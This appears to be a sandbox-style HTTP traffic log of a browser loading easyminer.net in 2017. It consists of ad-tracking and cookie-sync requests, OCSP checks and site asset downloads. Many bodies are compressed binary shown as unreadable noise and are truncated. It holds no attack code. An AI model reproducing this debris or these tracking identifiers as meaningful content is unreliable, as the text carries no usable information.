Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:42 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:42 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /pixel?e_rc=1&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 1107

Date: Fri, 21 Jul 2017 15:05:47 GMT
(new Image()).src = "http:\/\/i.w55c.net\/ping_match.gif?st=EYEOTA&rur
l=http://ps.eyeota.net/match?bid=9sn4omv&uid=_wfivefiv
ec_&newuser=1";(new Image()).src = "http:\/\/d.turn.com\/r\/dd\/id
\/L2NzaWQvMS9jaWQvMjg0NTA1NDYvdC8w\/url\/http:\/\/ps.eyeota.net\/match
?bid=1mpjpn0&turn_id=$!{TURN_UUID}&newuser=1";(new Image()).src = "htt
p:\/\/sync.tidaltv.com\/GenericUserSync.ashx?dpid=42";(new Image()).sr
c = "http:\/\/sync.mathtag.com\/sync\/img?mt_exid=10015&redir=http:%
2F/ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]";(new
 Image()).src = "http:\/\/in.v12group.com\/insync?vxii_pid=10005&vxii_
pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0";function eyeota_cal
lback(){var script=document.createElement("script");script.setAttribut
e("type","text\/javascript");script.setAttribute("async","");script.se
tAttribute("defer","");script.setAttribute("src","http:\/\/ps.eyeota.n
et\/pixel?e_rc=2&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296D
F");var s = document.getElementsByTagName('script')[0];s.parentNode.in
sertBefore(script, s);};setTimeout(eyeota_callback,5000);HTTP/1.1 200 
OK..Content-Type: application/javascript..Content-Length: 1107..Date: 
Fri, 21 Jul 2017 15:05:47 GMT..(new Image()).src = "http:\/\/i.w55c.ne
t\/ping_match.gif?st=EYEOTA&rurl=http://ps.eyeota.net/match?
bid=9sn4omv&uid=_wfivefivec_&newuser=1";(new Image()).src = 
"http:\/\/d.turn.com\/r\/dd\/id\/L2NzaWQvMS9jaWQvMjg0NTA1NDYvdC8w\/url
\/http:\/\/ps.eyeota.net\/match?bid=1mpjpn0&turn_id=$!{TURN_UUID}&<<< skipped >>>

GET /match?bid=1mpjpn0&turn_id=2489555661493901901&newuser=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:47 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:47 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?uid=639581525868801423&bid=omt9pi0 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:52 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:52 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=r8d1b20 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:52 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:52 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;..

GET /idsync/ex/receive/check?partner_id=2376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&partner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID}&bid=6bnoi0v HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: pixel.tapad.com

Connection: Keep-Alive

Cookie: TapAd_TS=1500649552454; TapAd_DID=16918e61-6e26-11e7-8451-005056a24356


HTTP/1.1 302 Found

Server: nginx/1.11.3

Date: Fri, 21 Jul 2017 15:05:52 GMT

Transfer-Encoding: chunked

Connection: keep-alive

P3P: policyref="hXXp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

Set-Cookie: TapAd_TS=1500649552454;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Set-Cookie: TapAd_DID=16918e61-6e26-11e7-8451-005056a24356;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Location: hXXp://match.adsrvr.org/track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=%2Chttp%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D16918e61-6e26-11e7-8451-005056a24356%26bid%3D6bnoi0v

0..HTTP/1.1 302 Found..Server: nginx/1.11.3..Date: Fri, 21 Jul 2017 15
:05:52 GMT..Transfer-Encoding: chunked..Connection: keep-alive..P3P: p
olicyref="hXXp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="N
OI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE".
.Set-Cookie: TapAd_TS=1500649552454;Expires=Tue, 19 Sep 2017 15:05:52 
GMT;Path=/;Domain=.tapad.com..Set-Cookie: TapAd_DID=16918e61-6e26-11e7
-8451-005056a24356;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain
=.tapad.com..Location: hXXp://match.adsrvr.org/track/cmf/generic?ttd_p
id=tapad&ttd_tpi=1&ttd_puid=%2Chttp%3A%2F%2Fps.eyeota.net%2F
match%3Fuid%3D16918e61-6e26-11e7-8451-005056a24356%26bid%3D6bn
oi0v..0..

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQUwPiEZQ6/sVZNPaFToNfxx8ZwqAQUfAwyH6fZMH/EfWijYqihzqsHWycCAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.starfieldtech.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:59 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=118548, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Jul 2017 13:45:47 GMT

Expires: Sun, 23 Jul 2017 01:45:47 GMT

ETag: "636520c5f482677ea2eb9bb7cfd91d251ecbfe6d"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1781

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.110/.
.U...(Starfield Root Validation Authority - G2..20170721134547Z0d0b0:0
... ............e...VM=.S.....p...|.2...0..}h.b.....['.......201707211
34547Z....20170723014547Z0...*.H..............k.........z....@...>l
.K2{`Dl.Z..0......Rc......j.5]._..f..."].P/.CK=......N..t...<...&.N
.v&.Y..j....D..x....".TI>.."Awk.a...........-.\e.Tm...90.$.gm..A.`.
..F.9...q..% ......o8.......H.L.n..$(.*C.:.x.g.x...&.P.:.....f =f...&.
..s]{.Q...m.Y.lM..Ht.f......UB....0...0...0............*.rO5.f0...*.H.
.......0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1%0#..U.
...Starfield Technologies, Inc.1200..U...)Starfield Root Certificate A
uthority - G20...161213070000Z..171213070000Z0..1.0...U....US1.0...U..
..Arizona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.1
10/..U...(Starfield Root Validation Authority - G20.."0...*.H.........
....0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9...
....._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt
.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...
X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}......
....0..0...U.......0.0...U...........0...U.%..0... .......0...U.......
.J!~...}....^].....0... .....0......0F..U...?0=0;.9.7.5hXXp://crl.star
fieldtech.com/repository/sfroot-g2.crl0P..U. .I0G0E..`.H...n....0604..
 ........(hXXp://crl.starfieldtech.com/repository/0...*.H.........<<< skipped >>>

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1+30c7dH4b0W1Ws3NcQwg6piOcCAzkUhA== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.starfieldtech.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:53 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=119047, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Jul 2017 13:54:26 GMT

Expires: Sun, 23 Jul 2017 01:54:26 GMT

ETag: "ffc31f5ba89f470c3bf712250ac481c986ef52b2"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1738

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.110/.
.U...(Starfield Root Validation Authority - G1..20170721135426Z0f0d0&l
t;0... ............[..a.Ti!.h...3m...._.......[U...........9......2017
0721135426Z....20170723015426Z0...*.H.................^.^........-..~-
..:`....-.,.....r.....f...j.90.a.r<I........(..OT..?q...^...z...*nC
.W.g.D.F]...k........V.u .v....... ..l....-.,..C...FA.M....r...Kq_.|e.
;4..~uS......u..........`4.....eK...F4w%...#P...9Q.....z..-'...H....r.
.?J.j...V.G.....HE$.U4. ..w......0..{0..w0.._.......(...M..B0...*.H...
.....0h1.0...U....US1%0#..U....Starfield Technologies, Inc.1200..U...)
Starfield Class 2 Certification Authority0...161214070000Z..2112140700
00Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1%0#..U....S
tarfield Technologies, Inc.110/..U...(Starfield Root Validation Author
ity - G10.."0...*.H.............0.............}...@.H..........j.b.2.c
....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0
 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.
....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>...nvU...
g.wU........ Fh.6F...}.........0..0...U.......0.0...U...........0...U.
%..0... .......0...U........J!~...}....^].....0... .....0......0C..U..
.<0:08.6.4.2hXXp://crl.starfieldtech.com/repository/sfroot.crl0P..U
. .I0G0E..`.H...n....0604.. ........(hXXp://crl.starfieldtech.com/repo
sitory/0...*.H..................H.... ..~C.&...N..y..~.j}.'..Me...<<< skipped >>>

GET /track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: match.adsrvr.org

Connection: Keep-Alive

Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; TDCPM=CAEYBSgCMgsIyKH71ZWVqDUQBTgB


HTTP/1.1 302 Found

Cache-Control: private,no-cache, must-revalidate

Content-Type: text/html

Date: Fri, 21 Jul 2017 15:05:23 GMT

Location: hXXp://ps.eyeota.net/match?uid=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&bid=1e2n4ou

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: TDID=d0758d3b-c6d8-453b-b2ec-324c93cd1abd; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:24 GMT; path=/

Set-Cookie: TDCPM=CAESFQoGZXllb3RhEgsImq2XpP6UqDUQBRgFIAEoAjILCMih-9WVlag1EAU4AQ..; domain=.adsrvr.org; expires=Sat, 21-Jul-2018 15:05:24 GMT; path=/

X-AspNet-Version: 4.0.30319

Content-Length: 189

Connection: keep-alive
Redirecting to: <a href="hXXp://ps.eyeota.net/match?uid=d0758d3b-c6
d8-453b-b2ec-324c93cd1abd&bid=1e2n4ou">hXXp://ps.eyeota.net/match?u
id=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&bid=1e2n4ou</a>HTTP/1.1 
302 Found..Cache-Control: private,no-cache, must-revalidate..Content-T
ype: text/html..Date: Fri, 21 Jul 2017 15:05:23 GMT..Location: hXXp://
ps.eyeota.net/match?uid=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&bid=1e2n4
ou..P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
..Pragma: no-cache..Server: Microsoft-IIS/8.5..Set-Cookie: TDID=d0758d
3b-c6d8-453b-b2ec-324c93cd1abd; domain=.adsrvr.org; expires=Sat, 21-Ju
l-2018 15:05:24 GMT; path=/..Set-Cookie: TDCPM=CAESFQoGZXllb3RhEgsImq2
XpP6UqDUQBRgFIAEoAjILCMih-9WVlag1EAU4AQ..; domain=.adsrvr.org; expires
=Sat, 21-Jul-2018 15:05:24 GMT; path=/..X-AspNet-Version: 4.0.30319..C
ontent-Length: 189..Connection: keep-alive..Redirecting to: <a href
="hXXp://ps.eyeota.net/match?uid=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&
bid=1e2n4ou">hXXp://ps.eyeota.net/match?uid=d0758d3b-c6d8-453b-b2ec
-324c93cd1abd&bid=1e2n4ou</a>..<<< skipped >>>

GET /e/?v=1a&pid=5200&site=1&l=http://easyminer.net/&j= HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: e.dtscout.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Fri, 21 Jul 2017 15:05:41 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: close

X-Z: E

Set-Cookie: m=1; expires=Fri, 21-Jul-2017 15:35:41 GMT; Max-Age=1800; path=/; domain=dtscout.com

Set-Cookie: b=1; expires=Fri, 21-Jul-2017 23:05:41 GMT; Max-Age=28800; path=/; domain=dtscout.com

Set-Cookie: ey=1; expires=Fri, 21-Jul-2017 23:05:41 GMT; Max-Age=28800; path=/; domain=dtscout.com

Set-Cookie: ah=1; expires=Sat, 22-Jul-2017 15:05:41 GMT; Max-Age=86400; path=/; domain=dtscout.com

Set-Cookie: df=1500649541; expires=Sun, 21-Jul-2019 15:05:41 GMT; Max-Age=63072000; path=/; domain=dtscout.com

Set-Cookie: d=null; expires=Wed, 20-Jul-2022 15:05:41 GMT; Max-Age=157680000; path=/; domain=dtscout.com

Expires: Fri, 21 Jul 2017 15:05:40 GMT

Cache-Control: no-cache

Set-Cookie: l=a7bnLVlyGEWxLEMm35YiAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.dtscout.com; path=/
ea2..(function() {.    var dc = {};.    var gu = false.    String.prot
otype.dts_hash_code=function(){var hash=0;if(this.length==0)return has
h;for(i=0;i<this.length;i  ){char=this.charCodeAt(i);hash=((hash<
;<5)-hash) char;hash=hash&hash}return hash;};..    function _dtsi()
 {.        a = document.createElement("a"), a.href = window.location.h
ref, _dts.host = a.hostname, "undefined" != typeof document.referrer &
& document.referrer.length > 0 ? (_dts.r = document.referrer, _dts.
p = _dts_gp(_dts.r), "q" in _dts.p ? _dts.q = _dts.p.q : "query" in _d
ts.p ? _dts.q = _dts.p.query : "p" in _dts.p ? _dts.q = _dts.p.p : "te
xt" in _dts.p ? _dts.q = _dts.p.text : "wd" in _dts.p ? _dts.q = _dts.
p.wd : _dts.q = 0) : (_dts.r = 0, _dts.q = 0).    }.    var _dts = {};
.    _dtsi();..    function __dtsinit() {.        var c = document.coo
kie.split(';');.        for(i = c.length - 1; i >= 0; i--) {.      
     cv = c[i].trim().split('=');.           dc[cv[0]] = cv[1];.      
  }.    }.    var di = __dtsinit();..    if(gu !== false && gu.length 
> 15) {.        lp(gu);.    } else if("__dtsu" in dc && dc.__dtsu.l
ength > 15) {.        lp(dc.__dtsu);.    } else {.        window.ad
dEventListener('message', function(e) {.            if(e.origin.indexO
f('dtscout.com') >= 0) {.                if(e.data.length > 0) {
.                    var temp = JSON.parse(e.data);.                  
  lp(temp.u);.                }.            }.        });..        var
 i = document.createElement('iframe');.        i.src = "//t.dtscou<<< skipped >>>

GET /templates/kickstart/css/iabootstrap.css?fm=1492603357 HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Wed, 19 Apr 2017 12:02:37 GMT

Content-Type: text/css

Content-Length: 47432

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
............k.c9...}... .]5.RI..2.<..........|...8..R..k....t.._<
;I..<Rf..w#.......A..@..?..........l.....v.\..{.....a;....>...7.
.> .?n.O............u._....zw...z.C.?-&.z_O;....u.....H..uq........
x.14.q...?..=....?.....?..l......fw..w...?.6......<..j.....~..g.j.|
...l........U......n...........8....O....b..........V.r.K..L..~.....p.
..e(_......L......Z>#.].f..B..z..=tW....v....n5..q........_...../}.
o.O..j..X../....,..j......P-.....qRm......w...F..d^W0........XU....^./
....}=......?=O....z..8L>.T..bs1.._...v.y......hu. ...b]w.....I..]`
..z4..5.2..zsx...8..,.?..(..u.0.Q..w?...i....P...C...T..j.....va.6....
z..v...R.*...`.h..r.7....l..w?...e...x...t...a.....:S.YO_..0.6.G...L..
..t..o.....-.....| .a<G.z. .....W.......<z7.....w}.....iA.......
............ee..v._...v5...[d=b:l..n..^!n.;u.......Q.1..]......./.....
........*}.R:...y....u^._.i.G;.......r.u....B.R<..\...^.;h..N...q..
.....-J.vWGl...d...y<.../..J.%.n.Yo@.&.E..@..X.-.......b.=..6..O..V
.. w.. L.3..b=..{ .#.#.E....../..Z[`..4.ILg.e.K0'..T.."......=...i.O0.
.C...q.8...Z..n..f...q...q.....,..;i.'......|a........U..A*.F.....l39.
....T.......a[M.8....}.........y=..#.tqW.....d#..o9~F.>....g.Kt)...
o...0.......4..~..'.35.....e>..lQ/...n#....&.....n'....Ta..h.J`....
d.h.!..B...,...~..y.j...n#w{.. :......-j.e.X....o."..0..o:.X..}z@A.D..
..v_.....?R.8.Y......9....?o.;...: ._1..o.._..Y,........&......X...7cU
O.Ug..Y....Q5C.:..0m..`xF.N...%......G..y5...c`JH..........0E.4.......
.R.4.....<PS.3G.u.......{,.....w.....$.8!..........n.=...v..U(|<<< skipped >>>

GET /js/intelli/intelli.minmax.js?fm=1491181282 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: application/x-javascript

Content-Length: 522

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........TMo. ...W.4.X....sY/.a=T;MSD......$m......v..C..;.|.......e
.a....H.G...>...".I....O^...).@k.3kw...!..'.$.^a....R..GP)..#!W.$%.
..?.A.V.*.......>_U.sF...E..F.M8......U...vw2".Y(.O...1.$.. L.D._.|
..^<..v....R..`..  .m...qM..^g..D.q...h.!..E..\.#..L.n)H. Og.3.i.}:
...VK.Z..#V(..p41.O..G.{S..C...Q5.4...q..8..#.@fF.<...........Y...C
/.i...c.s...{.pk.H..]..o.......`.-....k........i...i................P@
_..O....d....&.k%..>E...ady...6...6..u.....v..N...k_U.S..(.m.W.ic..
. .g]5....lLn.'.....E}.......ep....u...r;..[.......


GET /modules/fancybox/js/jquery.fancybox.pack.js?fm=1491181282 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: application/x-javascript

Content-Length: 9692

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........\kw.Hr.._!a..`6!.3.......=..&..'..h.= .>..IP............
..Y..n.......y.....L.........y.F...|.......~*.;......4....W..~o5M..l./
.O.g...}.8.K...A>.{...y..9....N..]Oq.q....y6.1.......I...$...`k>
...~.O.."\-..U...$....:Y...a`....xl..Oa...<.u.J.Gq|o.r.$X/.|...&..I
8H..<L?-0.".B..p..A.l.;.m.......b8.{q...O..O0...Z.A....E...........
.. .MW....d..>Ns?1.g.fs.........U...Y._..a>[.~p..==?;.ZvM....0..
c?.....:......4....m...1..].c...b...<...t.^....h=O.],7:.c&...4z}f..
..|.......a..G...d8.M.1/...U..<j...?t.h..u>|...K.L..IV....k.....
mx.5..}.[..4..cd..hiz....)%},.Y.k.......,|c.Y...m..f.1..q..yX$....#..K
.f.K...g..m>-..q(F.......d.n.m.ec..O.......y.e......."...<......
...fs...y...$O~..Ez.@........7.1..|.5..".d...B. he...h....c.H.K..(.%..
.....>.2.B.Xe..E.y..i.\.:...i.m..({.L..h}.}........[.......3).r....
O.. ...>....x..,D..n......o.n....o....8.n~<....p..%..<..d ;..
-[..*_..n........F"<....O...4..%...JZ..1(...N.....t.,...dZ.U.a.t>
;...^.....p9.N_...../...S.;......=1.I..0....lrR....i.....w......O/....
....a..0)Z/.]|3...P.K...;..;...6....{.\.N.8(....h._..?..?...Nf_w....59
i....'Z\2t.. ....B..`:.K.d8...i..JR.].:.....U........4.Ng.a';.....Egqz
.i.%.....0.'.....g.^..A.BX.\$..J.wM..=.z.g.....M....F..]r....Z\H....Uz
.w....Bw.}.....6L.......T....;.L..c...v.........F8F]H...p|..L.........
........PD....|0.F...l...D.W.W....E.g).t-...!><...:............}
..u...i.z...?...,...N_,..%..dc..H..t...H7.^....5..8..S....z.E.Wj.[....
..m.y0{.5..h.kY.kd....H....lM.1[..5Y. C.....`...}^-...e.......?7..<<< skipped >>>

GET /modules/fancybox/js/jquery.fancybox.css?fm=1491181282 HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: text/css

Content-Length: 1578

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........X.o.6........60m.I..}..,.^6...@I...&..v.v..wGR.).iW....q..}
.uq..l.*.~.GrX...[.fu....#.........B.......t...G..Y.n....zo..7.R......
..$bc..t[.......;....Y........fe).vM.w.....P.;......^)._....{.n.(..L.-
...~7.2.$vp..n..........r...J.........5..V.$...#./.%....rV<l...rM.6
o..v.-5`..........b.~.D..<...z1.a..7krS....Bw...C8'd.2..k.x..#.....
[..........,..HV......U6#....u........(...3.ep.|.f.iwS.Sm$Z..e.....S..
...wZe.\hS.-.i........7F...z.F p.%x.b..~......N..{.r..g?....a...7b....
...%.... a9. ,\.a|. ....p...d).Z..5......(m.@...XU\l ....z.)...#M.p...
..aRCH..,.TH..x.6...KtKA..M|..O..[......W.jj.z..j{....O. .>.l... .K
!.Nz.D....u.t.r..{.Z.....g...;G..P......<W.M....BA...(....>E^...
.j....UyX.@.....o...5.*....(M..9...r.J56..t.%4.g.e.y.......g...f4(>
.C..N)#.<.m..K^h.y..I(D....X...Ey'.%S.^}....T\........6aXV..T....4d
..Z...`V..}"....rW...s...A.c.......o..........j..A4"..9.h.....z....Jz.
.$.......2(. \~t..ra.u....-1z.-.!Hh..y^..-.r....o..[..i...g.~.-Ek....b
Wkc..a...'.....&H....P...>....G.....9.......\.O..*..RR..;....G`$...
.....c..0.ta3....]........{'.&..~TX..$.QWKR.my...z.[.3...z.....xst..8.
.8...?. ....;.v.~......I....~..L.P.5...o.).....~&>QF.]..nfJ.....=..
...k.m.... . ..........JH..wN(..A...B.........2...r..Q.rE..I.nL6...LBr
....l...%.....~j_c. .~.......p...........QH.c.N..Ie8....C`"AA...j..w..
....V..........9-..........B0.6..#...p\.C.iQm6..'....*e..b.Hz.#D..#H..
m...0..~R.a...a.K.=G[......S.#[.,*Q4/.....R0..|...."L..U..;.h...?....Z
.......0K...|B.$.q.......tr.<.c.w..Qixn.x.:.%b..4...i....-.".?~<<< skipped >>>

GET /templates/kickstart/img/bg-header-3.jpg HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Tue, 18 Apr 2017 08:13:08 GMT

Content-Type: image/jpeg

Content-Length: 714711

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
